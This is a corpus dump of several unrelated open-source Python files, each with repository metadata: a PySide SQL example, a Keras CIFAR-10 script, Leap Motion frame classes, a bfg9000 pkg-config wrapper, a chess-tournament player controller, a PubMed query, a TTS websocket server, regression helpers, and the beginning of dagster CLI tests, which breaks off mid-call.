| ShiomiyaRinne/FFXIV-Market-Query | main.py | main.py | py | 3,542 | python | en | code | 1 | github-code | 36 |
28613364026 | from PySide import QtCore, QtGui, QtSql
import connection
def initializeModel(model):
    """Configure a QSqlRelationalTableModel over the employee table.

    Columns 2 and 3 (city/country foreign keys) are resolved to the
    `name` column of their lookup tables; edits are only written on an
    explicit submitAll() because of OnManualSubmit.
    """
    model.setTable("employee")
    model.setEditStrategy(QtSql.QSqlTableModel.OnManualSubmit)
    model.setRelation(2, QtSql.QSqlRelation('city', 'id', 'name'))
    model.setRelation(3, QtSql.QSqlRelation('country', 'id', 'name'))
    model.setHeaderData(0, QtCore.Qt.Horizontal, "ID")
    model.setHeaderData(1, QtCore.Qt.Horizontal, "Name")
    model.setHeaderData(2, QtCore.Qt.Horizontal, "City")
    model.setHeaderData(3, QtCore.Qt.Horizontal, "Country")
    model.select()
def createView(title, model):
    """Return a QTableView for `model` with combo-box editing of relations."""
    view = QtGui.QTableView()
    view.setModel(model)
    # The relational delegate shows foreign keys as editable combo boxes.
    view.setItemDelegate(QtSql.QSqlRelationalDelegate(view))
    view.setWindowTitle(title)
    return view
def createRelationalTables():
    """Create and seed the example employee/city/country tables in-place."""
    query = QtSql.QSqlQuery()
    query.exec_("create table employee(id int, name varchar(20), city int, country int)")
    query.exec_("insert into employee values(1, 'Espen', 5000, 47)")
    query.exec_("insert into employee values(2, 'Harald', 80000, 49)")
    query.exec_("insert into employee values(3, 'Sam', 100, 41)")
    query.exec_("create table city(id int, name varchar(20))")
    query.exec_("insert into city values(100, 'San Jose')")
    query.exec_("insert into city values(5000, 'Oslo')")
    query.exec_("insert into city values(80000, 'Munich')")
    query.exec_("create table country(id int, name varchar(20))")
    query.exec_("insert into country values(41, 'USA')")
    query.exec_("insert into country values(47, 'Norway')")
    query.exec_("insert into country values(49, 'Germany')")
if __name__ == '__main__':
    import sys
    app = QtGui.QApplication(sys.argv)
    # Abort if the example database connection cannot be opened.
    if not connection.createConnection():
        sys.exit(1)
    createRelationalTables()
    model = QtSql.QSqlRelationalTableModel()
    initializeModel(model)
    view = createView("Relational Table Model", model)
    view.show()
    sys.exit(app.exec_())
| pyside/Examples | examples/sql/relationaltablemodel.py | relationaltablemodel.py | py | 1,963 | python | en | code | 357 | github-code | 36 |
30753498437 | from __future__ import absolute_import, division, print_function, unicode_literals
import os
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
import matplotlib.pyplot as plt
# Where the trained Keras model is saved after fitting.
CHECKPOINT_PATH = "model/lab2.h5"
def main():
    """Train a small CNN on CIFAR-10, save it, and plot accuracy curves."""
    (train_images, train_labels), (test_images,
                                   test_labels) = datasets.cifar10.load_data()
    # Normalize pixel values to be between 0 and 1
    train_images, test_images = train_images / 255.0, test_images / 255.0
    # NOTE(review): class_names is never used below — kept for reference.
    class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer',
                   'dog', 'frog', 'horse', 'ship', 'truck']
    # Three conv blocks followed by a small dense classifier (10 classes).
    model = models.Sequential()
    model.add(layers.Conv2D(
        32, (3, 3), activation='relu', input_shape=(32, 32, 3)))
    model.add(layers.MaxPooling2D((2, 2)))
    model.add(layers.Conv2D(64, (3, 3), activation='relu'))
    model.add(layers.MaxPooling2D((2, 2)))
    model.add(layers.Conv2D(64, (3, 3), activation='relu'))
    model.add(layers.Flatten())
    model.add(layers.Dense(64, activation='relu'))
    model.add(layers.Dense(10, activation='softmax'))
    model.compile(optimizer='adam',
                  loss='sparse_categorical_crossentropy',
                  metrics=['accuracy'])
    history = model.fit(train_images, train_labels, epochs=10,
                        validation_data=(test_images, test_labels))
    model.save(CHECKPOINT_PATH)
    model.evaluate(test_images, test_labels, verbose=2)
    # Training vs validation accuracy per epoch.
    plt.plot(history.history['accuracy'], label='accuracy')
    plt.plot(history.history['val_accuracy'], label='val_accuracy')
    plt.xlabel('Epoch')
    plt.ylabel('Accuracy')
    plt.ylim([0.5, 1])
    plt.legend(loc='lower right')
    plt.show()
if __name__ == "__main__":
    main()
| sontuphan/deep-learning-labs | labs/lab2.py | lab2.py | py | 1,755 | python | en | code | 0 | github-code | 36 |
34316494896 | '''
Created on Mar 6, 2014
@author: kerem
'''
from random import randint
from random import random as rnd
class InteractionBox(object):
    """Picklable stand-in for the Leap Motion InteractionBox.

    Attributes default to None at class level and are populated either
    directly (random frames) or via set() from a real SDK box.
    """
    center = None
    width = None
    height = None
    depth = None
    is_valid = None
    def __init__(self):
        pass
    def set(self, box):
        """Copy the fields of a real SDK box; returns self for chaining."""
        self.center = box.center.to_tuple()
        self.width = box.width
        self.height = box.height
        self.depth = box.depth
        self.is_valid = box.is_valid
        return self
class LeapHand(object):
    """Picklable clone of a Leap Motion Hand (vectors stored as tuples)."""
    # All attributes default to None at class level; __init__ fills them.
    id = None
    frame = None
    palm_position = None
    stabilized_palm_position = None
    palm_velocity = None
    palm_normal = None
    direction = None
    sphere_center = None
    sphere_radius = None
    time_visible = None
    is_valid = None
    _translation = None
    _translation_prob = None
    def __init__(self, hand, frame, random=False, position=None):
        """Copy fields from an SDK `hand`, or synthesize random data.

        With random=True, `hand`/`frame` are ignored; `position`, when
        given, pins the stabilized palm position (must be a 3-tuple).
        """
        if random:
            self.id = 1
            self.frame = None
            if position:
                assert len(position) == 3
                self.stabilized_palm_position = position
            else:
                self.stabilized_palm_position = (rnd() * 100, rnd() * 100, rnd() * 100)
            self.palm_normal = (rnd() * 100, rnd() * 100, rnd() * 100)
            self.palm_position = (rnd() * 100, rnd() * 100, rnd() * 100)
            self.palm_velocity = (rnd() * 100, rnd() * 100, rnd() * 100)
            self.direction = (rnd() * 100, rnd() * 100, rnd() * 100)
            self.sphere_center = (rnd() * 100, rnd() * 100, rnd() * 100)
            self.time_visible = randint(1, 100)
            self.is_valid = True
        else:
            self.id = hand.id
            self.frame = frame
            # to_tuple() converts SWIG vector objects into plain tuples,
            # which is what makes this clone picklable.
            self.stabilized_palm_position = hand.stabilized_palm_position.to_tuple()
            self.palm_normal = hand.palm_normal.to_tuple()
            self.palm_position = hand.palm_position.to_tuple()
            self.palm_velocity = hand.palm_velocity.to_tuple()
            self.direction = hand.direction.to_tuple()
            self.sphere_center = hand.sphere_center.to_tuple()
            self.time_visible = hand.time_visible
            self.is_valid = hand.is_valid
class LeapFrame(object):
    '''
    This is a pure python clone of the Leap Motion Controller
    frame objects. It is written to be picklable, unlike the
    original, SWIG-generated frame objects. It does not include
    anything finer-grained than hand movements i.e. no pointables,
    fingers or tools.
    '''
    # Attributes default to None at class level; __init__ fills them.
    id = None
    timestamp = None
    hands = None
    interaction_box = None
    current_frames_per_second = None
    is_valid = None
    def __init__(self, frame, random=False, position=None):
        '''
        Constructs a new python frame from the original frame.
        With random=True the SDK `frame` is ignored and a single
        random LeapHand (optionally pinned at `position`) is created.
        '''
        if random:
            self.id = randint(0,100)
            self.timestamp = randint(0,10000)
            self.hands = [LeapHand(None, None, random=random, position=position)]
            self.interaction_box = InteractionBox()
            self.interaction_box.center = (randint(0,100),randint(0,100),randint(0,100))
            self.interaction_box.width = randint(0,100)
            self.interaction_box.height = randint(0,100)
            self.interaction_box.depth = randint(0,100)
            self.current_frames_per_second = randint(0,100)
            self.is_valid = True
        else:
            self.id = frame.id
            self.timestamp = frame.timestamp
            self.hands = [LeapHand(hand, self) for hand in frame.hands]
            self.interaction_box = InteractionBox().set(frame.interaction_box)
            self.current_frames_per_second = frame.current_frames_per_second
            self.is_valid = frame.is_valid
    def get_stabilized_position(self):
        """
        Shortcut to getting the stabilized position of
        the first available hand.
        """
        return self.hands[0].stabilized_palm_position
    def hand(self, id):
        """
        The Hand object with the specified ID in this frame.
        NOTE: not implemented — currently returns None.
        """
        pass
    def gestures(self, sinceFrame):
        """
        Returns a GestureList containing all gestures that have
        occured since the specified frame.
        NOTE: not implemented — currently returns None.
        """
        pass
    def toJSON(self):
        """Serialize this frame to a jsonpickle JSON string."""
        import jsonpickle
        return jsonpickle.encode(self)
    def __str__(self):
        return "LeapFrame({:.2f},{:.2f},{:.2f})".format(*self.get_stabilized_position())
    def __repr__(self):
        return str(self)
def generateRandomSignal(duration):
    """
    Return a list of `duration` jsonpickle-encoded random LeapFrame
    strings (NOT LeapFrame objects) for testing purposes; the x
    coordinate of the pinned hand increases by one per frame.
    """
    from jsonpickle import encode
    lst = []
    for i in range(duration):
        frame = LeapFrame(None, random=True, position=(40 + i, 30, 30))
        lst.append(encode(frame))
    return lst
| keryil/leaparticulatorqt | leaparticulator/data/frame.py | frame.py | py | 4,847 | python | en | code | 0 | github-code | 36 |
24390093684 | import argparse
import os
import re
import subprocess
from . import tool
from .common import check_which, Command, guess_command, make_command_converter
from .. import log, options as opts, shell
from ..exceptions import PackageResolutionError, PackageVersionError
from ..file_types import Directory, HeaderDirectory
from ..iterutils import iterate, listify
from ..objutils import memoize_method
from ..packages import Package, PackageKind
from ..path import Path, Root
from ..shell import posix as pshell, which
from ..versioning import check_version, SpecifierSet, Version
# Tiny argparse parsers used to pick the -L / -I options out of
# pkg-config's compiler/linker flag output.
_lib_dirs_parser = argparse.ArgumentParser()
_lib_dirs_parser.add_argument('-L', action='append', dest='lib_dirs')
_include_dirs_parser = argparse.ArgumentParser()
_include_dirs_parser.add_argument('-I', action='append', dest='include_dirs')
# Heuristic mapping from a C compiler command name (e.g. "gcc-9") to the
# matching pkg-config executable name.
_c_to_pkgconf = make_command_converter([
    (re.compile(r'gcc(?:-[\d.]+)?(?:-(?:posix|win32))?'), 'pkg-config'),
])
def _shell_split(output):
    """Split pkg-config output like a POSIX shell (honoring escapes) into an option_list."""
    return pshell.split(output, type=opts.option_list, escapes=True)
def _requires_split(output):
return [i.split(' ')[0] for i in output.split('\n') if i]
@tool('pkg_config')
class PkgConfig(Command):
    """Wrapper for the pkg-config (or pkgconf) command-line tool."""
    # Map command names to pkg-config flags and whether they should be treated
    # as shell arguments.
    _options = {
        'version': (['--modversion'], None),
        'requires': (['--print-requires'], _requires_split),
        'path': (['--variable=pcfiledir'], None),
        'install_names': (['--variable=install_names'], _shell_split),
        'include_dirs': (['--cflags-only-I'], _shell_split),
        'other_cflags': (['--cflags-only-other'], _shell_split),
        'lib_dirs': (['--libs-only-L'], _shell_split),
        'other_ldflags': (['--libs-only-other'], _shell_split),
        'ldlibs': (['--libs-only-l'], _shell_split),
    }
    @staticmethod
    def _get_command(env):
        """Locate the pkg-config executable: $PKG_CONFIG, then a guess
        derived from the C compiler's name, then the defaults."""
        cmd = env.getvar('PKG_CONFIG')
        if cmd:
            return check_which(cmd, env.variables)
        # We don't have an explicitly-set command from the environment, so try
        # to guess what the right command would be based on the C compiler
        # command.
        default = ['pkg-config', 'pkgconf']
        sibling = env.builder('c').compiler
        guessed_cmd = guess_command(sibling, _c_to_pkgconf)
        # If the guessed command is the same as the default command candidate,
        # skip it. This will keep us from logging a useless info message that
        # we guessed the default value for the command.
        if guessed_cmd is not None and guessed_cmd != default:
            try:
                cmd = which(guessed_cmd, env.variables)
                log.info('guessed pkg-config {!r} from c compiler {!r}'
                         .format(guessed_cmd, shell.join(sibling.command)))
                return cmd, True
            except FileNotFoundError:
                pass
        # Try the default command candidate.
        return check_which(default, env.variables)
    def __init__(self, env):
        super().__init__(env, command=('pkg_config',) + self._get_command(env))
    def _call(self, cmd, names, type, static=False, msvc_syntax=False,
              options=[]):
        """Build the argv for one pkg-config invocation.

        NOTE: the mutable default `options=[]` is safe here because it is
        only concatenated, never mutated.
        """
        result = cmd + listify(names) + self._options[type][0] + options
        if static:
            result.append('--static')
        if msvc_syntax:
            result.append('--msvc-syntax')
        return result
    def run(self, names, type, *args, extra_env=None, installed=None,
            **kwargs):
        """Run pkg-config and post-process the output for `type`.

        installed=True disables "-uninstalled" variants via the
        environment; installed=False explicitly queries them.
        """
        if installed is True:
            extra_env = dict(PKG_CONFIG_DISABLE_UNINSTALLED='1',
                             **(extra_env or {}))
        elif installed is False:
            names = [i + '-uninstalled' for i in iterate(names)]
        result = super().run(names, type, *args, extra_env=extra_env,
                             **kwargs).strip()
        if self._options[type][1]:
            return self._options[type][1](result)
        return result
    def search_path(self, extra=[]):
        """Join `extra` with $PKG_CONFIG_PATH into one search-path string.
        (`extra=[]` is safe: only concatenated, never mutated.)"""
        path = self.env.variables.get('PKG_CONFIG_PATH')
        if path:
            return shell.join_paths(extra + [path])
        return shell.join_paths(extra)
class PkgConfigPackage(Package):
    """A Package whose compile/link options come from pkg-config .pc files."""
    def __init__(self, pkg_config, name, submodules=None,
                 specifier=SpecifierSet(), pcnames=None, *, format,
                 kind=PackageKind.any, system=True, deps=None,
                 search_path=None):
        """Resolve the package, raising PackageResolutionError if pkg-config
        cannot find it and PackageVersionError if `specifier` is not met."""
        super().__init__(name, submodules, format=format, deps=deps)
        self._pkg_config = pkg_config
        self._env = ({'PKG_CONFIG_PATH': pkg_config.search_path(search_path)}
                     if search_path else {})
        self.pcnames = pcnames if pcnames is not None else [name]
        try:
            version = self._call(self.pcnames[0], 'version')
            version = Version(version) if version else None
        except subprocess.CalledProcessError:
            raise PackageResolutionError("unable to find package '{}'"
                                         .format(name))
        if version:
            check_version(version, specifier, name, PackageVersionError)
        self.version = version
        self.specifier = specifier
        self.static = kind == PackageKind.static
        self.system = system
    @memoize_method
    def _call(self, *args, extra_env=None, **kwargs):
        # Memoized so repeated queries don't re-spawn pkg-config.
        final_env = dict(**self._env, **extra_env) if extra_env else self._env
        return self._pkg_config.run(*args, extra_env=final_env, **kwargs)
    def include_dirs(self, **kwargs):
        """Return the package's -I directories as absolute Paths."""
        args = self._call(self.pcnames, 'include_dirs', self.static, **kwargs)
        inc_dirs = _include_dirs_parser.parse_known_args(args)[0].include_dirs
        return [Path(i, Root.absolute) for i in inc_dirs or []]
    def lib_dirs(self, **kwargs):
        """Return the package's -L directories as absolute Paths."""
        args = self._call(self.pcnames, 'lib_dirs', self.static, **kwargs)
        lib_dirs = _lib_dirs_parser.parse_known_args(args)[0].lib_dirs
        return [Path(i, Root.absolute) for i in lib_dirs or []]
    def _get_rpaths(self):
        """Build rpath options (ELF), distinguishing installed vs
        uninstalled library directories when they differ."""
        extra_env = {'PKG_CONFIG_ALLOW_SYSTEM_LIBS': '1'}
        def rpaths_for(installed):
            try:
                return self.lib_dirs(extra_env=extra_env, installed=installed)
            except shell.CalledProcessError:
                return None
        uninstalled = rpaths_for(installed=False)
        installed = rpaths_for(installed=True)
        if uninstalled is None or uninstalled == installed:
            return opts.option_list(opts.rpath_dir(i) for i in installed)
        else:
            return opts.option_list(
                (opts.rpath_dir(i, 'uninstalled') for i in uninstalled),
                (opts.rpath_dir(i, 'installed') for i in installed or []),
            )
    def _get_install_name_changes(self, pcnames=None):
        """Build install_name_change options (macOS) for this package and,
        recursively, its public pkg-config requirements."""
        if pcnames is None:
            pcnames = self.pcnames
        def install_names_for(installed):
            try:
                return self._call(pcnames, 'install_names', self.static,
                                  installed=installed)
            except shell.CalledProcessError:
                return None
        uninstalled = install_names_for(installed=False)
        installed = install_names_for(installed=True)
        if ( uninstalled is None or installed is None or
             uninstalled == installed ):
            result = opts.option_list()
        else:
            result = opts.option_list(opts.install_name_change(i, j)
                                      for i, j in zip(uninstalled, installed))
        # Recursively get install_name changes for public requirements.
        requires = self._call(pcnames, 'requires')
        for i in requires:
            result.extend(self._get_install_name_changes(i))
        return result
    def compile_options(self, compiler, *, raw=False):
        """Return compiler options; `raw` skips MSVC-syntax translation."""
        flags = self._call(self.pcnames, 'other_cflags', self.static,
                           not raw and compiler.flavor == 'msvc')
        # Get include paths separately so we can selectively use them as
        # "system" includes; this helps ensure that warnings in external
        # headers don't break the build when using `-Werror`.
        incdirs = opts.option_list(
            opts.include_dir(HeaderDirectory(i, system=self.system))
            for i in self.include_dirs()
        )
        return flags + incdirs
    def link_options(self, linker, *, raw=False):
        """Return linker options, plus platform extras (rpaths on ELF,
        install_name changes on Mach-O) for shared linkage."""
        flags = self._call(self.pcnames, 'other_ldflags', self.static,
                           not raw and linker.flavor == 'msvc')
        libdirs = opts.option_list(opts.lib_dir(Directory(i))
                                   for i in self.lib_dirs())
        # XXX: How should we ensure that these libs are linked statically when
        # necessary?
        libs = self._call(self.pcnames, 'ldlibs', self.static,
                          not raw and linker.flavor == 'msvc')
        libs = opts.option_list(opts.lib_literal(i) for i in libs)
        # Add extra link options as needed for platform-specific oddities.
        extra_opts = opts.option_list()
        if not raw and not self.static:
            if linker.builder.object_format == 'elf':
                # pkg-config packages don't generally include rpath
                # information, so we need to generate it ourselves.
                extra_opts = self._get_rpaths()
            elif linker.builder.object_format == 'mach-o':
                # When using uninstalled variants of pkg-config packages, we
                # should check if there are any install_names set that we need
                # to update when installing. For more information, see the
                # pkg-config builtin.
                extra_opts = self._get_install_name_changes()
        return flags + libdirs + libs + extra_opts
    def path(self):
        """Return the directory containing the package's primary .pc file."""
        return self._call(self.pcnames[0], 'path')
    def __repr__(self):
        return '<{}({!r}, {!r})>'.format(
            type(self).__name__, self.name, str(self.version)
        )
# A package automatically generated for us by mopack. This is useful when
# generating our own pkg-config file, so that we don't add this one as a
# requirement (it's only temporary, after all).
class GeneratedPkgConfigPackage(PkgConfigPackage):
    """Marker subclass: identical behavior, distinguishable via isinstance."""
    pass
def resolve(env, name, *args, generated=False, **kwargs):
    """Resolve `name` via pkg-config, logging where it was found.

    `generated=True` marks the package as a temporary, mopack-generated one.
    """
    # `type` shadows the builtin here; it holds the class to instantiate.
    type = GeneratedPkgConfigPackage if generated else PkgConfigPackage
    pkg = type(env.tool('pkg_config'), name, *args, **kwargs)
    log.info('found package {!r} version {} via pkg-config in {}'
             .format(pkg.name, pkg.version, os.path.normpath(pkg.path())))
    return pkg
| jimporter/bfg9000 | bfg9000/tools/pkg_config.py | pkg_config.py | py | 10,628 | python | en | code | 73 | github-code | 36 |
71023850983 | from vues.vue_joueurs import VueJoueur
from models.joueur import Joueur
import utilitaires.menu as menu
class ControllerJoueur:
    """Controller for player management: creation, lookup, ranking updates."""
    def __init__(self, db_table_joueur, requete):
        self.table = db_table_joueur
        self.user = requete
    def creer_joueur(self):
        """Create a player from user input and persist it to 'table_joueur'."""
        joueur = Joueur(VueJoueur.creer_nom_joueur(),
                        VueJoueur.creer_prenom_joueur(),
                        VueJoueur.creer_date_naissance_joueur(),
                        VueJoueur.creer_sexe_joueur(),
                        VueJoueur.creer_classement_joueur(),
                        self.table, self.user)
        # Save once to obtain an id, then save again with the id attached.
        id_joueur = joueur.sauvegarder_joueur_dans_db()
        joueur.id = id_joueur
        joueur.sauvegarder_joueur_dans_db()
        return joueur
    def ajouter_joueur(self, nombre_joueurs):
        """Create new players or fetch existing ones from the database;
        return the list of players that were added."""
        liste_joueurs = []
        while True:
            for i in range(nombre_joueurs):
                choix = {1: "Creer nouveau joueur", 2: "Choisir joueur dans la base de donnee"}
                try:
                    choix_utilisateur = VueJoueur.choisir_ajouter_joueur()
                    if choix_utilisateur in choix:
                        if choix_utilisateur == 1:
                            joueur = self.creer_joueur()
                            for id in joueur.id:
                                joueur.id = id
                            liste_joueurs.append(joueur)
                            i += 1
                        elif choix_utilisateur == 2:
                            choix = VueJoueur.choisir_par_id(self.table)
                            joueur_recuperer = self.recuperer_joueur_db(choix)
                            joueur = Joueur.deserialiser_joueur(joueur_recuperer)
                            joueur.id = choix
                            liste_joueurs.append(joueur)
                            i += 1
                        else:
                            VueJoueur.afficher_message_erreur()
                    else:
                        VueJoueur.afficher_message_erreur()
                except ValueError:
                    VueJoueur.afficher_message_erreur()
            return liste_joueurs
    def recuperer_joueur_db(self, choix):
        """Fetch a player from the database by its document id."""
        id = self.table.get(doc_id=choix)
        if id != []:
            return id
        else:
            VueJoueur.afficher_message_erreur()
    def modifier_classement_joueur(self) -> str:
        """Let the user update a player's ranking, selected by id."""
        while True:
            try:
                joueur_a_modifier = VueJoueur.modifier_classement(self.table)
                joueur_trouve = self.table.get(doc_id=joueur_a_modifier)
                if joueur_trouve is not None:
                    nouveau_classement = VueJoueur.entrer_nouveau_classement()
                    self.table.update({"classement": nouveau_classement}, doc_ids=[joueur_a_modifier])
                    return joueur_trouve
                else:
                    VueJoueur.afficher_message_erreur()
            except ValueError:
                VueJoueur.afficher_message_erreur()
    def gerer_joueurs(self):
        """Drive the player-management sub-menu of the main menu."""
        while True:
            menu_joueur = menu.Menu("Menu joueur", menu.option_joueur)
            choix_joueur = menu_joueur.afficher()
            if choix_joueur == "1":
                self.creer_joueur()
            elif choix_joueur == "2":
                self.modifier_classement_joueur()
            elif choix_joueur == "3":
                print("Retour en arriere")
                break
            else:
                print("Choix invalide !")
def main():
    # Placeholder entry point; the controller is driven from elsewhere.
    pass
if __name__ == "__main__":
    main()
| pnt983/P_4_OpenClassRooms | controllers/controller_joueurs.py | controller_joueurs.py | py | 3,987 | python | fr | code | 0 | github-code | 36 |
571623190 | from pymed import PubMed
"""In MEDLINE/PubMed, every journal article is indexed with about 10–15 subject headings,
subheadings and supplementary concept records, with some of them designated as major and marked
with an asterisk, indicating the article's major topics. When performing a MEDLINE search via PubMed,
entry terms are automatically translated into (i.e. mapped to) the corresponding descriptors with a
good degree of reliability; it is recommended to check the 'Details tab' in PubMed to see how a search
formulation was translated. By default, a search for a descriptor will include all the descriptors in
the hierarchy below the given one. PubMed does not apply automatic mapping of the term in the following
circumstances: by writing the quoted phrase (e.g., "kidney allograft"), when truncated on the asterisk
(e.g., kidney allograft *), and when looking with field labels (e.g., Cancer [ti]).
Campos-Asensio, C. (2018). "Cómo elaborar una estrategia de búsqueda bibliográfica".
Enfermería Intensiva (in Spanish). 29 (4): 182–186. """
# tool/email identify the client to NCBI, as required by E-utilities etiquette.
pubmed = PubMed(tool="MyTool", email="my@email.address")
# Fetch up to 500 articles whose MEDLINE language field is Spanish.
results = pubmed.query("spanish[Language]" , max_results=500)
for res in results:
    print(res)
9262633989 | from tts_websocketserver.tts_pipeline import get_pipeline
from rgws.interface import WebsocketServer
import json, asyncio
class TTSPipelineManager:
    """Owns the TTS pipeline and tracks its lifecycle state as a string."""
    def __init__(self):
        self.state = "Setup"
        self.pipeline = get_pipeline()
        self.pipeline.build()
        self.state = "Ready"
    async def process_text(self, text):
        """Async generator yielding one {'resp': prediction} per call."""
        self.state = "Processing"
        yield {"resp": self.pipeline.predict(text)}
        self.state = "Processed"
    async def status(self):
        return self.state
    def __del__(self):
        # NOTE(review): relying on __del__ for disposal is fragile — Python
        # does not guarantee when (or whether) it runs; consider an explicit
        # close()/context-manager API.
        self.state = "Disposing"
        self.pipeline.dispose()
        self.state = "Disposed"
# building in global so it can also be imported from outside
# eg. from tts_websocketserver.tts_server import tts_pipeline
tts_pipeline = TTSPipelineManager()
class TTSServerInterface(WebsocketServer):
    """Websocket server exposing the shared TTS pipeline over JSON-RPC."""
    def __init__(self, **kwargs):
        super(TTSServerInterface, self).__init__(**kwargs)
        # Register the callable endpoints clients may dispatch to.
        self._register(tts_pipeline.process_text)
        self._register(self.status)
        self._register(self.setup_model)
    async def _consumer(self, ws, message):
        """Dispatch one incoming message and stream every yielded result back."""
        ret = await self.dispatch(message)
        async for gen in ret:
            await ws.send_json(gen)
    async def status(self):
        yield {"resp": tts_pipeline.state}
    async def setup_model(self):
        # True once the pipeline has moved past its "Setup" state.
        yield {"resp": True if tts_pipeline.state != "Setup" else False}
def run():
    """Start the TTS websocket server on localhost:8787 and block forever."""
    s = TTSServerInterface(host="localhost", port=8787)
    # NOTE(review): asyncio.get_event_loop() is deprecated for this use in
    # modern Python; asyncio.new_event_loop()/asyncio.run would be preferred.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(s.run())
    loop.run_forever()
# Allow running the server directly as a script.
if __name__ == "__main__":
    run()
1495371874 | import numpy as np
def compute_cost(X, y, theta):
    """Mean squared-error cost J(theta) = (1/2m) * sum((X.theta - y)^2)."""
    residual = np.dot(X, theta) - y
    return (residual ** 2).sum() / (2 * y.size)
def gradient_descent(X, y, theta, alpha, iterations):
    """Run `iterations` batch gradient-descent steps for linear regression.

    Updates `theta` in place (and also returns it).
    """
    step = alpha / y.size
    for _ in range(iterations):
        gradient = np.dot(X.T, np.dot(X, theta) - y)
        theta -= step * gradient
    return theta
def feature_normalize(X):
    """Z-score each column of X; return (normalized X, column means, column stds)."""
    mu = X.mean(axis=0)
    sigma = X.std(axis=0)
    return ((X - mu) / sigma, mu, sigma)
def gradient_descent_multi(X, y, theta, alpha, num_iters):
    """Batch gradient descent recording the cost history.

    Mutates `theta` in place and returns (theta, j_history), where
    j_history has num_iters + 1 entries: the initial cost followed by
    the cost after each iteration.

    Bug fix: the original called np.insert(j_history, 0, j0) and discarded
    the result — np.insert returns a *new* array — so the initial cost was
    lost and the final history slot was always 0.
    """
    m = y.size
    j_history = np.zeros(num_iters + 1)
    j_history[0] = compute_cost(X, y, theta)
    for i in range(num_iters):
        error = np.dot(X, theta) - y
        theta -= (alpha / m) * np.dot(X.T, error)
        j_history[i + 1] = compute_cost(X, y, theta)
    return (theta, j_history)
def normal_eqn(X, y):
    """Closed-form least squares: solve the normal equations (XᵀX)θ = Xᵀy.

    Improvement: uses np.linalg.solve instead of explicitly inverting XᵀX,
    which is faster and numerically better conditioned while producing the
    same solution (and still raising LinAlgError for a singular system).
    """
    return np.linalg.solve(np.dot(X.T, X), np.dot(X.T, y))
| takehilo/coursera-machine-learning-python | ex1/functions.py | functions.py | py | 993 | python | en | code | 1 | github-code | 36 |
495434407 | from __future__ import print_function
import os
import string
import mock
import pytest
from click import UsageError
from click.testing import CliRunner
from dagster import (
DagsterInvariantViolationError,
PartitionSetDefinition,
RepositoryDefinition,
ScheduleDefinition,
lambda_solid,
pipeline,
repository_partitions,
schedules,
seven,
solid,
)
from dagster.check import CheckError
from dagster.cli.pipeline import (
execute_backfill_command,
execute_execute_command,
execute_list_command,
execute_print_command,
execute_scaffold_command,
pipeline_backfill_command,
pipeline_execute_command,
pipeline_list_command,
pipeline_print_command,
pipeline_scaffold_command,
)
from dagster.cli.run import run_list_command, run_wipe_command
from dagster.cli.schedule import (
schedule_list_command,
schedule_restart_command,
schedule_start_command,
schedule_stop_command,
schedule_up_command,
schedule_wipe_command,
)
from dagster.config.field_utils import Shape
from dagster.core.instance import DagsterInstance, InstanceType
from dagster.core.launcher import RunLauncher
from dagster.core.serdes import ConfigurableClass
from dagster.core.storage.event_log import InMemoryEventLogStorage
from dagster.core.storage.local_compute_log_manager import NoOpComputeLogManager
from dagster.core.storage.root import LocalArtifactStorage
from dagster.core.storage.runs import InMemoryRunStorage
from dagster.utils import script_relative_path
from dagster.utils.test import FilesytemTestScheduler
def no_print(_):
    """print_fn stand-in that discards its argument, keeping CLI helpers quiet in tests."""
    return None
@lambda_solid
def do_something():
return 1
@lambda_solid
def do_input(x):
return x
@pipeline(name='foo')
def foo_pipeline():
do_something()
def define_foo_pipeline():
return foo_pipeline
@pipeline(name='baz', description='Not much tbh')
def baz_pipeline():
do_input()
def define_bar_repo():
return RepositoryDefinition('bar', {'foo': define_foo_pipeline, 'baz': lambda: baz_pipeline},)
@solid
def spew(context):
context.log.info('HELLO WORLD')
@solid
def fail(context):
raise Exception('I AM SUPPOSED TO FAIL')
@pipeline
def stdout_pipeline():
spew()
@pipeline
def stderr_pipeline():
fail()
def test_list_command():
runner = CliRunner()
execute_list_command(
{
'repository_yaml': None,
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'define_bar_repo',
},
no_print,
)
result = runner.invoke(
pipeline_list_command,
['-f', script_relative_path('test_cli_commands.py'), '-n', 'define_bar_repo'],
)
assert result.exit_code == 0
assert result.output == (
'Repository bar\n'
'**************\n'
'Pipeline: baz\n'
'Description:\n'
'Not much tbh\n'
'Solids: (Execution Order)\n'
' do_input\n'
'*************\n'
'Pipeline: foo\n'
'Solids: (Execution Order)\n'
' do_something\n'
)
execute_list_command(
{
'repository_yaml': None,
'python_file': None,
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': 'define_repo',
},
no_print,
)
result = runner.invoke(
pipeline_list_command, ['-m', 'dagster_examples.intro_tutorial.repos', '-n', 'define_repo']
)
assert result.exit_code == 0
assert result.output == (
'Repository hello_cereal_repository\n'
'**********************************\n'
'Pipeline: complex_pipeline\n'
'Solids: (Execution Order)\n'
' load_cereals\n'
' sort_by_calories\n'
' sort_by_protein\n'
' display_results\n'
'*******************************\n'
'Pipeline: hello_cereal_pipeline\n'
'Solids: (Execution Order)\n'
' hello_cereal\n'
)
execute_list_command(
{
'repository_yaml': script_relative_path('repository_module.yaml'),
'python_file': None,
'module_name': None,
'fn_name': None,
},
no_print,
)
result = runner.invoke(
pipeline_list_command, ['-y', script_relative_path('repository_module.yaml')]
)
assert result.exit_code == 0
assert result.output == (
'Repository hello_cereal_repository\n'
'**********************************\n'
'Pipeline: complex_pipeline\n'
'Solids: (Execution Order)\n'
' load_cereals\n'
' sort_by_calories\n'
' sort_by_protein\n'
' display_results\n'
'*******************************\n'
'Pipeline: hello_cereal_pipeline\n'
'Solids: (Execution Order)\n'
' hello_cereal\n'
)
with pytest.raises(UsageError):
execute_list_command(
{
'repository_yaml': None,
'python_file': 'foo.py',
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': 'define_repo',
},
no_print,
)
result = runner.invoke(
pipeline_list_command,
['-f', 'foo.py', '-m', 'dagster_examples.intro_tutorial.repos', '-n', 'define_repo'],
)
assert result.exit_code == 2
with pytest.raises(UsageError):
execute_list_command(
{
'repository_yaml': None,
'python_file': None,
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': None,
},
no_print,
)
result = runner.invoke(pipeline_list_command, ['-m', 'dagster_examples.intro_tutorial.repos'])
assert result.exit_code == 2
with pytest.raises(UsageError):
execute_list_command(
{
